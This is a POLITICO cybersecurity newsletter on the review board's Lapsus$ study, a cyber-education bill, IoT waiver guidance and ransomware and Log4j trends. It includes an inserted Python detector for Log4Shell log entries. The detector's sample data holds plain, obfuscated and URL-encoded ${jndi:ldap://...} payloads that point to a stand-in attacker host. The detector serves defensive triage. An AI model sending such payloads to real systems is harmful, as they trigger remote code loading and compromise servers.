With Lapsus$, cyber review board draws mixed reviews
With help from Eric Geller
—The Cyber Safety Review Board has identified a rabble-rousing extortion group as the subject of its second-ever review. It’s a choice that some deem far-sighted — and others fear misses the mark.
HAPPY MONDAY, and welcome to Morning Cybersecurity! “Goblin Mode” has been named Oxford English Dictionary’s 2022 word of the year — and I have absolutely nothing smart to say about that.
Got tips, feedback or other commentary? Send them my way at [email protected]. You can also follow @POLITICOPro and @MorningCybersec on Twitter. Full team contact info is below.
Homeland Security Secretary Alejandro Mayorkas speaks at a Center for Strategic and International Studies event on the “convergence” of national and homeland security. 2 p.m.
Want to receive this newsletter every weekday? Subscribe to POLITICO Pro. You’ll also receive daily policy news and other intelligence you need to act on the day’s biggest stories.
MISSED OPPORTUNITY? — DHS’s decision to direct the Cyber Safety Review Board to study the Lapsus$ hacker ring is drawing a mixture of criticism and praise from the cybersecurity community, with experts divided about the value of probing a group whose remarkable success and conspicuous style have already made it the subject of extensive public review.
The argument for — A member of the 10-month-old independent investigatory group, which is staffed by public and private cybersecurity experts, told MC they were happy with the decision to make Lapsus$ the focus of the board’s second-ever review because it represented “the most dangerous threat actor today … and it's not even close.”
The individual, who was granted anonymity to speak openly about the board, defended the idea that a review of Lapsus$ could add significant value to the community, even though there is voluminous reporting on how it used basic malware and innovative social engineering techniques to run amok through well-resourced technology companies, among them Okta, Uber, Microsoft and Rockstar Games.
“To the best of our knowledge, there has not been a public, comprehensive review of Lapsus$ tradecraft, or why they were so effective against the most well-resourced companies on the planet,” said the CSRB board member.
Because their techniques will likely be picked up by other hacking groups, “a CSRB review can add significant value to the community,'' added the individual.
The argument against — The shortcomings of DHS’s choice have less to do with what it did direct the independent board to study than what it didn’t, argued Trey Herr, director of the Atlantic Council’s Cyber Statecraft Initiative.
“The government is giving up an opportunity to do a whole lot more,” said Herr, who lamented that the government and private sector already have multiple projects dedicated to understanding Lapsus$ and the digital extortion racket more broadly.
Meanwhile, the CSRB has again punted on the idea of conducting a review of the SolarWinds campaign — the issue President Joe Biden first directed the board to investigate when he established the CSRB in May 2021.
Official response? — Asked why DHS neglected to assign a study of the infamous Russian campaign for the second time, a spokesperson for the department told MC it conducts reviews on topics “that are most relevant to the current threat landscape and that can have an immediate impact.”
“The review into Lapsus$ is a clear opportunity to achieve that,” continued the spokesperson.
Room for improvement — Six other security experts and former U.S. officials who spoke with MC came out 4-2 in favor of the Lapsus$ choice. But almost every one qualified their answers because they weren’t sure why the board made its choice or where it intended to take the study.
And that speaks to a related issue for the CSRB, said Josh Corman, former chief strategist on CISA’s Covid-19 task force.
“The need for a trustworthy institution like the CSRB cannot be understated,” said Corman, now vice president of cyber safety strategy at Claroty. But “to establish that trust, it likely needs greater transparency regarding the criteria and process for nominating, prioritizing and selecting different topics.”
FIRST IN MC: THE OLD COLLEGE TRY — A freshman House Democrat who has taken an interest in cyber policy issues wants the White House to figure out new ways to get cybersecurity education into college classrooms, with a view toward diversifying the largely white, male field.
Rep. Ritchie Torres (D-N.Y.) on Friday introduced a bill, first reported by MC, that would require National Cyber Director Chris Inglis to convene a task force to produce “recommendations and guidance with respect to how to increase and promote cybersecurity courses, degrees, and programs in institutions of higher education in order to improve the diversity of the cybersecurity workforce.”
— Why it matters: Torres, a member of the House Homeland Security Committee, has stood out at panel hearings for his sharp questioning of Biden administration officials over cybersecurity shortcomings. In August, he told Eric and Maggie that he’s unsatisfied with the administration’s largely non-regulatory approach to protecting critical infrastructure.
With two longtime cyber-focused House lawmakers retiring in January, Torres is poised to become a more prominent advocate for cyber issues in the newly Republican-controlled chamber.
The new bill represents Torres’ attempt to increase pressure on the White House to prod colleges and universities into creating more pathways to cyber careers for more people.
— What he’s saying: “Fostering a culture of cybersecurity in all arenas of life is a matter of urgency, and nowhere more so than in higher education,” Torres told MC. “The lack of training in cybersecurity – even among graduates of computer science – has left a dangerous void in contemporary cyber education.” He cited “the history of malign neglect” that led to the Log4j vulnerability crisis, which “could have been prevented if the software developers had been sufficiently educated about best practices in secure coding.”
— How it would work: The bill would direct Inglis to assemble a team comprising representatives from CISA and higher education institutions, including those specifically serving Hispanic, Black and tribal populations. The task force would be required to submit an initial report with recommendations after one year, with subsequent reports due every two years.
— What’s next: Torres’ bill now awaits committee consideration. In the meantime, Inglis’ office is already working on a cyber workforce and education strategy that could either include or lead to the development of recommendations similar to what Torres envisions.
IN THE NICK OF TIME — The Office of Management and Budget has published guidance instructing federal agencies how to request waivers from a first-of-its-kind Internet of Things security law, just days before a key provision of the law takes effect.
The Friday memo from OMB director Shalanda D. Young stipulates that federal chief information officers can receive waivers to procure or use connected devices that do not meet new NIST standards surrounding IoT security and bug reporting if they file reports that include a rationale for the decision, information on how long they expect the carve-outs to apply and the signature of an agency head.
Ringing the bell — The memo came less than 24 hours after the Government Accountability Office warned OMB that a failure to produce the guidance before today — when federal agencies will be restricted from using or procuring noncompliant IoT devices — “could result in a range of inconsistent actions across agencies.”
RANSOMWARE TRENDS — The LockBit ransomware group accounted for more than a third of all ransomware attacks in the first half of 2022, finds research out this morning from cybersecurity firm Looking Glass. According to ransomware experts MC has interviewed in recent weeks, that’s due to two factors: First, the group has introduced updates to its code automating how affiliates — hackers to whom LockBit contracts out attacks — identify and exploit vulnerabilities in a network. Moreover, the group has built a network of top-tier affiliates.
RISE OF THE INFOSTEALER — Malicious software purpose-built to pilfer people’s login credentials is the new craze in the criminal underground, according to data out this morning from Accenture. The researchers believe the cheap, effective and easy-to-use nature of info-stealers produced a “marked increase” in the number of credentials for sale between July and October of this year. Another driver of their popularity? The very same Lapsus$, which relied heavily on info-stealers during its jaunt through some of the world’s biggest tech companies.
LOG4J THORN IN THE SIDE — The first subject of a CSRB review, Log4j, continues to pose a major threat to organizations, finds research out this morning from cybersecurity firm Arctic Wolf. Twenty-five percent of the victims the firm works with saw hackers try to exploit the bug in the widely used Java logging framework in the last year, while 60 percent of the Log4j cases it responded to traced back to top-tier ransomware groups, like the aforementioned LockBit. Though the initial CSRB report warned the problem would plague the security community for a decade or more, it’s “sobering” to see the bug become such a popular target for hackers, concluded Arctic Wolf.
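The Arctic Wolf figures describe exploitation attempts seen in the wild, and the quickest place to spot those attempts is the web server log, where a Log4Shell payload arrives as a `${jndi:...}` lookup string, frequently URL-encoded or hidden behind Log4j's own `${lower:}`, `${upper:}` and `${...:-default}` lookups. The detector below is an added example written for this page; it is not code from Arctic Wolf, the CSRB or the Log4j project. The log lines, paths, IP addresses (RFC 5737 documentation ranges) and ports in it are constructed.

```python
"""Spot Log4Shell-style JNDI lookup strings in web server log lines.

Added example, not taken from the newsletter, Arctic Wolf or the CSRB.
SAMPLE_LOG below is constructed: the IPs are RFC 5737 documentation
addresses and the requests are made up.
"""
from __future__ import annotations

import re
from urllib.parse import unquote

# Innermost ${...} expression: its body contains no nested '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The unobfuscated form we ultimately look for (case-insensitive).
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_MAX_ROUNDS = 50  # bound the de-obfuscation loop on pathological input


def _resolve(body: str) -> str | None:
    """Evaluate one innermost lookup the way Log4j 2 would for the lookups
    attackers use to hide the word 'jndi'. Returns None to leave the
    expression untouched (the jndi lookup itself, ${date:...}, etc.)."""
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return None  # never collapse the thing we are hunting for
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    # ${::-x}, ${env:UNSET:-x}, ${sys:nope:-x}: an unresolvable lookup
    # with a default value evaluates to the default.
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def _sub(match: re.Match) -> str:
    resolved = _resolve(match.group(1))
    return match.group(0) if resolved is None else resolved


def normalize(candidate: str) -> str:
    """URL-decode (twice, to tolerate double encoding), then collapse
    lower/upper/default lookups from the inside out until nothing changes,
    so an obfuscated payload reads as plain ${jndi:...}."""
    text = unquote(unquote(candidate))
    for _ in range(_MAX_ROUNDS):
        new = _INNER.sub(_sub, text)
        if new == text:
            break
        text = new
    return text


def is_jndi_lookup(candidate: str) -> bool:
    """True if the string carries a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalize(candidate)) is not None


def scan_lines(lines: list[str]) -> list[tuple[int, str]]:
    """Return (1-based line number, normalized line) for each log line that
    carries a JNDI lookup anywhere: path, query, referer or user agent."""
    hits = []
    for number, line in enumerate(lines, 1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((number, norm))
    return hits


# Constructed combined-log-format lines: one benign request, a plain
# payload in the User-Agent, an obfuscated one, a URL-encoded one in the
# query string, and a harmless-looking ${date:...} that must not fire.
SAMPLE_LOG = [
    '198.51.100.20 - - [05/Dec/2022:09:14:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [05/Dec/2022:09:14:05 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.22 - - [05/Dec/2022:09:14:09 +0000] "GET /api HTTP/1.1" 200 88 "-" "${${lower:j}${lower:n}${::-d}${lower:i}:${lower:l}dap://203.0.113.9/x}"',
    '198.51.100.23 - - [05/Dec/2022:09:14:11 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1" 404 153 "-" "curl/7.85.0"',
    '198.51.100.24 - - [05/Dec/2022:09:14:15 +0000] "GET /report?fmt=${date:yyyy-MM-dd} HTTP/1.1" 200 20 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, norm in scan_lines(SAMPLE_LOG):
        print(f"line {number}: {norm}")
```

The normalizer only reproduces the lookups an attacker can evaluate without knowing the target (`lower`, `upper` and default values); lookups such as `${env:...}` or `${sys:...}` without a default resolve on the victim host and cannot be replayed here, so treat this as a triage filter and review any `${...}` that reaches a Java application from untrusted input, not just the ones that normalize to `jndi`.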
Security researcher Matt Tait, formerly of GCHQ and Corellium, has an interesting write-up that examines how Russia might be using Telegram to conduct espionage in occupied portions of Ukraine.
— Several Android phone makers’ platform signing certificates were leaked and used to sign malware. (Wired)
— CommonSpirit Health finally fesses up to suffering a ransomware incident. (CommonSpirit.org)
— A new wiper that masquerades as ransomware is wreaking havoc in Russia. (Ars Technica)
— Russia is coordinating Ukraine hacks with missiles and could increasingly target European allies, Microsoft warns. (POLITICO)
Chat soon.
Stay in touch with the whole team: Eric Geller ([email protected]); Maggie Miller ([email protected]); John Sakellariadis ([email protected]); and Heidi Vogt ([email protected]).
Source: https://www.politico.com/